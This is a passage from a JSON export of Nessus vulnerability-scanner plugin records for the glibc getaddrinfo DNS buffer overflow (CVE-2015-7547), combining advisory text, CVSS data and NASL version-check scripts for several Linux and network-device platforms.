\"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0175\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-2.12-1.166.el6_7.7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-common-2.12-1.166.el6_7.7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.166.el6_7.7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.166.el6_7.7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-debuginfo-2.12-1.166.el6_7.7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-debuginfo-common-2.12-1.166.el6_7.7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-devel-2.12-1.166.el6_7.7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.166.el6_7.7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.166.el6_7.7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.166.el6_7.7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-static-2.12-1.166.el6_7.7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.166.el6_7.7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.166.el6_7.7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.166.el6_7.7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"nscd-2.12-1.166.el6_7.7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"nscd-2.12-1.166.el6_7.7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"nscd-2.12-1.166.el6_7.7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T20:20:11", "description": "From Red Hat Security Advisory 2016:0175 :\n\nUpdated glibc packages that fix one security issue and two bugs are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA stack-based buffer overflow was found in the way the libresolv library performed dual A/AAAA DNS queries. A remote attacker could create a specially crafted DNS response which could cause libresolv to crash or, potentially, execute code with the permissions of the user running the library. Note: this issue is only exposed when libresolv is called from the nss_dns NSS service module. (CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nThis update also fixes the following bugs :\n\n* The dynamic loader has been enhanced to allow the loading of more shared libraries that make use of static thread local storage. While static thread local storage is the fastest access mechanism it may also prevent the shared library from being loaded at all since the static storage space is a limited and shared process-global resource.\nApplications which would previously fail with 'dlopen: cannot load any more object with static TLS' should now start up correctly.\n(BZ#1291270)\n\n* A bug in the POSIX realtime support would cause asynchronous I/O or certain timer API calls to fail and return errors in the presence of large thread-local storage data that exceeded PTHREAD_STACK_MIN in size (generally 16 KiB). The bug in librt has been corrected and the impacted APIs no longer return errors when large thread-local storage data is present in the application. (BZ#1301625)\n\nAll glibc users are advised to upgrade to these updated packages, which contain backported patches to correct these issues.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-17T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : glibc (ELSA-2016-0175)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7547"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:glibc", "p-cpe:/a:oracle:linux:glibc-common", "p-cpe:/a:oracle:linux:glibc-devel", "p-cpe:/a:oracle:linux:glibc-headers", "p-cpe:/a:oracle:linux:glibc-static", "p-cpe:/a:oracle:linux:glibc-utils", "p-cpe:/a:oracle:linux:nscd", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2016-0175.NASL", "href": "https://www.tenable.com/plugins/nessus/88776", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2016:0175 and \n# Oracle Linux Security Advisory ELSA-2016-0175 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88776);\n script_version(\"2.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_xref(name:\"RHSA\", value:\"2016:0175\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n\n script_name(english:\"Oracle Linux 6 : glibc (ELSA-2016-0175)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2016:0175 :\n\nUpdated glibc packages that fix one security issue and two bugs are\nnow available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nThis update also fixes the following bugs :\n\n* The dynamic loader has been enhanced to allow the loading of more\nshared libraries that make use of static thread local storage. While\nstatic thread local storage is the fastest access mechanism it may\nalso prevent the shared library from being loaded at all since the\nstatic storage space is a limited and shared process-global resource.\nApplications which would previously fail with 'dlopen: cannot load any\nmore object with static TLS' should now start up correctly.\n(BZ#1291270)\n\n* A bug in the POSIX realtime support would cause asynchronous I/O or\ncertain timer API calls to fail and return errors in the presence of\nlarge thread-local storage data that exceeded PTHREAD_STACK_MIN in\nsize (generally 16 KiB). The bug in librt has been corrected and the\nimpacted APIs no longer return errors when large thread-local storage\ndata is present in the application. (BZ#1301625)\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-February/005782.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"glibc-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-common-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-devel-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-headers-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-static-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"glibc-utils-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"nscd-2.12-1.166.el6_7.7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-static / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T20:20:35", "description": "Fabio Olive Leite reports :\n\nA stack-based buffer overflow was found in libresolv when invoked from nss_dns, allowing specially crafted DNS responses to seize control of EIP in the DNS client. The buffer overflow occurs in the functions send_dg (send datagram) and send_vc (send TCP) for the NSS module libnss_dns.so.2 when calling getaddrinfo with AF_UNSPEC family, or in some cases AF_INET6 family. The use of AF_UNSPEC (or AF_INET6 in some cases) triggers the low-level resolver code to send out two parallel queries for A and AAAA. A mismanagement of the buffers used for those queries could result in the response of a query writing beyond the alloca allocated buffer created by __res_nquery.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-18T00:00:00", "type": "nessus", "title": "FreeBSD : glibc -- getaddrinfo stack-based buffer overflow (2dd7e97e-d5e8-11e5-bcbd-bc5ff45d0f28)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7547"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:linux_base-c6", "p-cpe:/a:freebsd:freebsd:linux_base-c6_64", "p-cpe:/a:freebsd:freebsd:linux_base-f10", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_2DD7E97ED5E811E5BCBDBC5FF45D0F28.NASL", "href": "https://www.tenable.com/plugins/nessus/88817", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88817);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n script_xref(name:\"IAVA\", value:\"2016-A-0053\");\n\n script_name(english:\"FreeBSD : glibc -- getaddrinfo stack-based buffer overflow (2dd7e97e-d5e8-11e5-bcbd-bc5ff45d0f28)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fabio Olive Leite reports :\n\nA stack-based buffer overflow was found in libresolv when invoked from\nnss_dns, allowing specially crafted DNS responses to seize control of\nEIP in the DNS client. The buffer overflow occurs in the functions\nsend_dg (send datagram) and send_vc (send TCP) for the NSS module\nlibnss_dns.so.2 when calling getaddrinfo with AF_UNSPEC family, or in\nsome cases AF_INET6 family. The use of AF_UNSPEC (or AF_INET6 in some\ncases) triggers the low-level resolver code to send out two parallel\nqueries for A and AAAA. A mismanagement of the buffers used for those\nqueries could result in the response of a query writing beyond the\nalloca allocated buffer created by __res_nquery.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=207272\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2015-7547\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://blog.des.no/2016/02/freebsd-and-cve-2015-7547/\"\n );\n # https://googleonlinesecurity.blogspot.no/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?94dd3376\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html\"\n );\n # https://vuxml.freebsd.org/freebsd/2dd7e97e-d5e8-11e5-bcbd-bc5ff45d0f28.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7a76ef5e\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux_base-c6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux_base-c6_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux_base-f10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/18\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/18\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux_base-c6<6.7_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux_base-c6_64<6.7_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux_base-f10>=0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:13:08", "description": "The version of Arista Networks EOS running on the remote device is affected by multiple stack-based buffer overflow conditions in the GNU libresolv library, specifically within the send_dg() and send_vc() functions, when handling DNS responses that trigger a call to the getaddrinfo() function with the AF_UNSPEC or AF_INET6 address family.\nAn unauthenticated, remote attacker can exploit these issues, via a specially crafted DNS response, to cause a denial of service condition or the execution of arbitrary code.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-02-28T00:00:00", "type": "nessus", "title": "Arista Networks EOS libresolv Overflow RCE (SA0017)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7547"], "modified": "2020-03-13T00:00:00", "cpe": ["cpe:/o:arista:eos"], "id": "ARISTA_EOS_SA0017.NASL", "href": "https://www.tenable.com/plugins/nessus/107059", "sourceData": "#TRUSTED 5c03b7cda25c6e50903ea18829757131c08b414448f381ee3fa9bf1389f936a1aa728d94fe5ab48283f4ca3c462f77e0929a6d7bfa4408aca5d4d0d80d615230527156c6d0630c4241c1bec0b20efe7ce5a6558d87049782cb2c51dc4702b416290d328a8b5132b6e7c0f32f6b564ba8a1366272600c0e35138817d8542b5e5c829c58d39176fa67b248701ac2f45ff0d2068e3ebaec4e57ba84ad80b9eac4e18fa480e12717d00a79efcf4cd5cbd57a6b8a6622b7356c804dd1e964bd7818e84cab854d4e33d9676bc08aa9cb23a895c23b8b646efdf91b187653718c46a918326f0cc4057b86c86f02b766c03bf9292e0dff81ce741764923760b61d8d1b3d3b8df402d72e8e35cfd35f9007b73cdc2c263bd50eda2f77d267d3714c2c7e60b1fd041ca4630840e6ca350540da0fb02b90528bb54cef55baef3ae27b64d26f5a127c405938ed5c41cafe230e1bdd2eaf804983c9d6b9cbaa8accf4cbdc94f776790b9ebb49e5caeb016f6dd23d7211c828d7f90d42ab0ed6f4bc0b58ef97d501c18ae411f2daea8aabe35d6be4a50622bdefa7849c1fa4267b8bed5babcc498e8eb5726bb7ef8586f93d89f64fec713fb0c7b6a5654b89daa92f063b830f1188baa547b53a0360f3f5e772c3405f5bc01ccdbb207c2cdca5c639e13525bc6bb4366676c0ef9b6281bac83ee5411ae4da842e7925106279d81835e661dd46f1\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107059);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/13\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_bugtraq_id(83265);\n script_xref(name:\"CERT\", value:\"457759\");\n script_xref(name:\"EDB-ID\", value:\"39454\");\n script_xref(name:\"EDB-ID\", value:\"40339\");\n\n script_name(english:\"Arista Networks EOS libresolv Overflow RCE (SA0017)\");\n script_summary(english:\"Checks the Arista Networks EOS version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Arista Networks EOS running on the remote device is\naffected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Arista Networks EOS running on the remote device is\naffected by multiple stack-based buffer overflow conditions in the GNU\nlibresolv library, specifically within the send_dg() and send_vc()\nfunctions, when handling DNS responses that trigger a call to the\ngetaddrinfo() function with the AF_UNSPEC or AF_INET6 address family.\nAn unauthenticated, remote attacker can exploit these issues, via a\nspecially crafted DNS response, to cause a denial of service condition\nor the execution of arbitrary code.\");\n # https://www.arista.com/en/support/advisories-notices/security-advisories/1255-security-advisory-17\n script_set_attribute( attribute:\"see_also\", value:\"http://www.nessus.org/u?050a280a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Arista Networks EOS version 4.13.15M / 4.14.12M / 4.15.5M\nor later. Alternatively, apply the patch or recommended mitigation\nreferenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7547\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:arista:eos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"arista_eos_detect.nbin\");\n script_require_keys(\"Host/Arista-EOS/Version\");\n\n exit(0);\n}\n\n\ninclude(\"arista_eos_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/Arista-EOS/Version\");\next1=\"2.6.0/2980299.gamiltonsecAdvisory0017Patch.63\";\nsha1=\"16948241511ccf7044a8e1eeef4e55d2181194296ea02e22f2bd6df69a3f25386bf2938f3086f67a148d84d62ede10fc530fbbbd27a58bb49d4c642ecc675690\";\next2=\"glibc-common.i686.rpm 2.13/4Ar\";\nsha2=\"ccdf8ad84ac1a7985d89b026a6a311533a0f028c4a80c9a8fafa9b1ac4386fe169adb15145faea2e8c8f8cc8e9152f42150c9bd7df63b4dbd4612641d9aabded\";\n\nif(eos_extension_installed(ext:ext1, sha:sha1) || eos_extension_installed(ext:ext2, sha:sha2)) \n exit(0, \"The Arista device is not vulnerable, as a relevant hotfix has been installed.\");\n\nvmatrix = make_array();\nvmatrix[\"all\"] = make_list(\"0.0<=4.11.99\");\nvmatrix[\"F\"] = make_list(\"4.13.1.1<=4.13.6\",\n \"4.14.0<=4.14.5\",\n \"4.15.0<=4.15.4\");\n\nvmatrix[\"M\"] = make_list(\"4.13.7<=4.13.14\",\n \"4.14.6<=4.14.11\");\n\nvmatrix[\"misc\"] = make_list(\"4.12.5.2\",\n \"4.12.6.1\",\n \"4.12.7.1\",\n \"4.12.8\", \n \"4.12.8.1\", \n \"4.12.9\", \n \"4.12.10\",\n \"4.12.11\",\n \"4.14.5FX\",\n \"4.14.5FX.1\",\n \"4.14.5FX.2\",\n \"4.14.5FX.3\",\n \"4.14.5FX.4\",\n \"4.14.5.1F-SSU\",\n \"4.15.0FX\",\n \"4.15.0FXA\",\n \"4.15.0FX1\",\n \"4.15.1FXB1\",\n \"4.15.1FXB\",\n \"4.15.1FX-7060X\",\n \"4.15.1FX-7260QX\",\n \"4.15.3FX-7050X-72Q\",\n \"4.15.3FX-7060X.1\",\n \"4.15.3FX-7500E3\",\n \"4.15.3FX-7500E3.3\",\n \"4.15.4FX-7500E3\");\nvmatrix[\"fix\"] = \"Apply one of the vendor supplied patches or upgrade to EOS 4.15.5M /4.14.12M / 4.13.15M or later\";\n\nif (eos_is_affected(vmatrix:vmatrix, version:version))\n{\n security_report_v4(severity:SECURITY_WARNING, port:0, extra:eos_report_get());\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Arista Networks EOS\", version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T20:22:28", "description": "This updates addresses a critical security vulnerability in the DNS resolver related to `AF_UNSPEC` queries with `getaddrinfo` (CVE-2015-7547). In addition, a bug that causes Hesiod lookups to fail with a crash is fixed.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.1, "vector": 